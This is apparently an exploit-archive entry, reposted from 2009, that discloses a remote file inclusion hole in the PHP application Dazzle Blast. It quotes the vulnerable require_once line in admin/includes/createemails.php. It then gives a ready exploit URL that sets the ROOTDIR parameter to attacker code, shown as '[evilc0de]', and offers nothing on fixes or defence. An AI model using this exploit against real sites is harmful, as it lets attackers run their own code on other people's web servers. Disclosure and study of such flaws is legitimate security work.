id: 9894
date: 10/12/2009
title: Dazzle Blast Remote File Inclusion
author: NoGe
cves: 

==================================
Dazzle Blast Remote File Inclusion
==================================

[o] Dazzle Blast Remote File Inclusion Vulnerability
Software : Dazzle Blast
Download : http://www.dazzleblast.com/dazzleblast.zip
Author   : NoGe
 
[o] Vulnerable file
require_once($ROOTDIR.'admin/functions/general.php');
 
admin/includes/createemails.php
 
 
[o] Exploit
http://localhost/[path]/admin/includes/createemails.php?ROOTDIR=[evilc0de]



#  0day.today [2023-03-26]  #